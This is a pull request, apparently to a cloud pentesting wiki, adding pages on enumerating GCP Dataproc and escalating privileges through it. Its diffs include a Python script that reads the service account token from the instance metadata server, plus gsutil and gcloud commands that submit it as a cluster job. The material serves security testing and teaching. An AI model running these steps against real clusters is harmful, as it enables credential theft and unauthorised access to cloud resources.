### PR TITLE
grte-shamooo

### DIFF
--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md
@@ -12,10 +12,16 @@ roles/dataproc.admin - Full control over Dataproc clusters, including creating, 
 
 These permissions make both roles highly sensitive and dangerous if misused.
 
+## dataproc.jobs.create & dataproc.clusters.use
+
+The following method - projects.regions.jobs.submit enables a SA to create a dataproc job, which can be abused as shown in the example below. it must be noted that in order to exploit these permissions SA should also have the necessary privileges to move the malicious script to the storage bucket (storage.objects.create).
+
+the following permissions were assigned to the SA for the PoC (dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get, storage.objects.list)   
+
 
 ## Privilege Escalation via Metadata Token Leaking
 
-By abusing the permissions granted by roles/dataproc.editor or roles/dataproc.admin, an attacker can: 
+
 
 - Submit a job to a Dataproc cluster.
 
@@ -29,7 +35,7 @@ The following script demonstrates how an attacker can submit a job to a Dataproc
 
 import requests
 
-# Metadata server URL to fetch the access token
+## Metadata server URL to fetch the access token
 
 ```
 metadata_url = "http://metadata/computeMetadata/v1/instance/service-accounts/default/token"
@@ -53,6 +59,9 @@ if __name__ == "__main__":
 ### Steps to exploit
 
 ```
+# Copy the script to the storage bucket
+gsutil cp fetch-metadata-token.py gs://dataproc-poc-bucket-hacktest/fetch-metadata-token.py
+# Submit the malicious job
 gcloud dataproc jobs submit pyspark gs://<bucket-name>/fetch_metadata_token.py \
     --cluster=<cluster-name> \
     --region=<region>

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md
@@ -1,27 +1,20 @@
 # GCP Dataproc Privilege Escalation
 
-## Dataproc Roles and Privilege Escalation
+{{#include ../../../banners/hacktricks-training.md}}
 
-Google Cloud Dataproc roles like roles/dataproc.editor and roles/dataproc.admin grant significant permissions over Dataproc resources. If these roles are assigned to a compromised user or service account, they can be abused to escalate privileges by leaking sensitive metadata tokens or accessing other GCP resources.
+## Dataproc
 
-## Key Permissions in Dataproc Roles
+{{#ref}}
+../gcp-services/gcp-dataproc-enum.md
+{{#endref}}
 
-roles/dataproc.editor - Modify Dataproc jobs. Submit PySpark, Spark, Hadoop, and other job types to a cluster. Access job logs and configurations. Interact with associated GCP services like Cloud Storage and BigQuery.
+### `dataproc.clusters.get`, `dataproc.clusters.use`, `dataproc.jobs.create`, `dataproc.jobs.get`, `dataproc.jobs.list`, `storage.objects.create`, `storage.objects.get` 
 
-roles/dataproc.admin - Full control over Dataproc clusters, including creating, deleting, and managing clusters.
+I was unable to get a reverse shell using this method, however it is possible to leak SA token from the metadata endpoint using the method described below. 
 
-These permissions make both roles highly sensitive and dangerous if misused.
+#### Steps to exploit
 
-## dataproc.jobs.create & dataproc.clusters.use
-
-The following method - projects.regions.jobs.submit enables a SA to create a dataproc job, which can be abused as shown in the example below. it must be noted that in order to exploit these permissions SA should also have the necessary privileges to move the malicious script to the storage bucket (storage.objects.create).
-
-the following permissions were assigned to the SA for the PoC (dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get, storage.objects.list)   
-
-
-## Privilege Escalation via Metadata Token Leaking
-
-
+- Place the job script on the GCP Bucket
 
 - Submit a job to a Dataproc cluster.
 
@@ -29,15 +22,9 @@ the following permissions were assigned to the SA for the PoC (dataproc.clusters
 
 - Leak the service account token used by the cluster.
 
-### Example Script for token leaking
-
-The following script demonstrates how an attacker can submit a job to a Dataproc cluster to leak the metadata token:
-
+```python
 import requests
 
-## Metadata server URL to fetch the access token
-
-```
 metadata_url = "http://metadata/computeMetadata/v1/instance/service-accounts/default/token"
 headers = {"Metadata-Flavor": "Google"}
 
@@ -56,20 +43,14 @@ if __name__ == "__main__":
     fetch_metadata_token()
 ```
 
-### Steps to exploit
-
-```
+```bash
 # Copy the script to the storage bucket
-gsutil cp fetch-metadata-token.py gs://dataproc-poc-bucket-hacktest/fetch-metadata-token.py
+gsutil cp <python-script> gs://<bucket-name>/<python-script>
+
 # Submit the malicious job
-gcloud dataproc jobs submit pyspark gs://<bucket-name>/fetch_metadata_token.py \
+gcloud dataproc jobs submit pyspark gs://<bucket-name>/<python-script> \
     --cluster=<cluster-name> \
     --region=<region>
 ```
-### Use the Leaked Token
 
-The leaked token can be used to:
-
-- Access GCP APIs and resources (depending on the token’s permissions).
-- Enumerate resources such as Cloud Storage buckets, BigQuery datasets, and more.
-- Potentially escalate privileges further if the token has high-level permissions (e.g., roles/owner)
+{{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md
@@ -1,0 +1,66 @@
+# GCP Dataproc Privilege Escalation
+
+## Dataproc Roles and Privilege Escalation
+
+Google Cloud Dataproc roles like roles/dataproc.editor and roles/dataproc.admin grant significant permissions over Dataproc resources. If these roles are assigned to a compromised user or service account, they can be abused to escalate privileges by leaking sensitive metadata tokens or accessing other GCP resources.
+
+## Key Permissions in Dataproc Roles
+
+roles/dataproc.editor - Modify Dataproc jobs. Submit PySpark, Spark, Hadoop, and other job types to a cluster. Access job logs and configurations. Interact with associated GCP services like Cloud Storage and BigQuery.
+
+roles/dataproc.admin - Full control over Dataproc clusters, including creating, deleting, and managing clusters.
+
+These permissions make both roles highly sensitive and dangerous if misused.
+
+
+## Privilege Escalation via Metadata Token Leaking
+
+By abusing the permissions granted by roles/dataproc.editor or roles/dataproc.admin, an attacker can: 
+
+- Submit a job to a Dataproc cluster.
+
+- Use the job to access the metadata server.
+
+- Leak the service account token used by the cluster.
+
+### Example Script for token leaking
+
+The following script demonstrates how an attacker can submit a job to a Dataproc cluster to leak the metadata token:
+
+import requests
+
+# Metadata server URL to fetch the access token
+
+```
+metadata_url = "http://metadata/computeMetadata/v1/instance/service-accounts/default/token"
+headers = {"Metadata-Flavor": "Google"}
+
+def fetch_metadata_token():
+    try:
+        response = requests.get(metadata_url, headers=headers, timeout=5)
+        response.raise_for_status()
+        token = response.json().get("access_token", "")
+        print(f"Leaked Token: {token}")
+        return token
+    except Exception as e:
+        print(f"Error fetching metadata token: {e}")
+        return None
+
+if __name__ == "__main__":
+    fetch_metadata_token()
+```
+
+### Steps to exploit
+
+```
+gcloud dataproc jobs submit pyspark gs://<bucket-name>/fetch_metadata_token.py \
+    --cluster=<cluster-name> \
+    --region=<region>
+```
+### Use the Leaked Token
+
+The leaked token can be used to:
+
+- Access GCP APIs and resources (depending on the token’s permissions).
+- Enumerate resources such as Cloud Storage buckets, BigQuery datasets, and more.
+- Potentially escalate privileges further if the token has high-level permissions (e.g., roles/owner)

--- a/src/pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.md
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.md
@@ -1,0 +1,47 @@
+# GCP Dataproc Enum
+
+## Basic Infromation
+
+Google Cloud Dataproc is a fully managed service for running Apache Spark, Apache Hadoop, Apache Flink, and other big data frameworks. It is primarily used for data processing, querying, machine learning, and stream analytics. Dataproc enables organizations to create clusters for distributed computing with ease, integrating seamlessly with other Google Cloud Platform (GCP) services like Cloud Storage, BigQuery, and Cloud Monitoring.
+
+Dataproc clusters run on virtual machines (VMs), and the service account associated with these VMs determines the permissions and access level of the cluster.
+
+## Components
+
+A Dataproc cluster typically includes:
+
+Master Node: Manages cluster resources and coordinates distributed tasks.
+
+Worker Nodes: Execute distributed tasks.
+
+Service Accounts: Handle API calls and access other GCP services.
+
+## Enumeration
+
+Dataproc clusters, jobs, and configurations can be enumerated to gather sensitive information, such as service accounts, permissions, and potential misconfigurations.
+
+### Cluster Enumeration
+
+To enumerate Dataproc clusters and retrieve their details:
+
+```
+gcloud dataproc clusters list --region=<region>
+gcloud dataproc clusters describe <cluster-name> --region=<region>
+```
+
+### Job Enumeration
+
+```
+gcloud dataproc jobs list --region=<region>
+gcloud dataproc jobs describe <job-id> --region=<region>
+```
+
+### Post Exploitation
+
+Enumerating Dataproc clusters can expose sensitive data, such as tokens, configuration scripts, or job output logs, which can be leveraged for further exploitation. Misconfigured roles or excessive permissions granted to the service account can allow:
+
+Access to sensitive APIs (e.g., BigQuery, Cloud Storage).
+
+Token Exfiltration via metadata server.
+
+Data Exfiltration from misconfigured buckets or job logs.

--- a/src/pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.md
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.md
@@ -1,4 +1,6 @@
-# GCP Dataproc Enum
+# GCP -  Dataproc Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Basic Infromation
 
@@ -36,12 +38,10 @@ gcloud dataproc jobs list --region=<region>
 gcloud dataproc jobs describe <job-id> --region=<region>
 ```
 
-### Post Exploitation
+### Privesc
 
-Enumerating Dataproc clusters can expose sensitive data, such as tokens, configuration scripts, or job output logs, which can be leveraged for further exploitation. Misconfigured roles or excessive permissions granted to the service account can allow:
+{{#ref}}
+../gcp-privilege-escalation/gcp-dataproc-privesc.md
+{{#endref}}
 
-Access to sensitive APIs (e.g., BigQuery, Cloud Storage).
-
-Token Exfiltration via metadata server.
-
-Data Exfiltration from misconfigured buckets or job logs.
+{{#include ../../../banners/hacktricks-training.md}}


### PR DESCRIPTION
This PR adds two new files documenting enumeration and privilege escalation techniques for GCP Dataproc:

gcp_dataproc_enum.md: Covers techniques to enumerate Dataproc clusters, jobs, service accounts, and metadata tokens for gathering sensitive information.
gcp_dataproc_privesc.md: Explains how roles like dataproc.editor and dataproc.admin can be exploited for privilege escalation, including token leakage and job-based attacks.
![image](https://github.com/user-attachments/assets/dac494d9-dd66-49c5-9193-c9bf5134a42d)




